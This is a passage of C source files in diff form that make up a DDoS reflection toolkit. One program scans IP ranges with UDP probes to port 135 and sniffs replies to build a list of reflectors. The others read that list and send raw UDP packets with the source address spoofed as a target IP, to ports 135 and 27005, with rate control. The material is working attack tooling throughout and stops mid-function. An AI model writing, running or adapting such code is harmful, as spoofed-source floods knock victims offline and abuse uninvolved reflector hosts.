fprintf(stdout, "Usage: %s <ip range start (192.168.0.0)> <ip range end (192.168.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(135);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 135;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, " ", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Host/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "B/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Running Thrds");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <ip range start (192.168.0.0)> <ip range end (192.168.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(27005);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
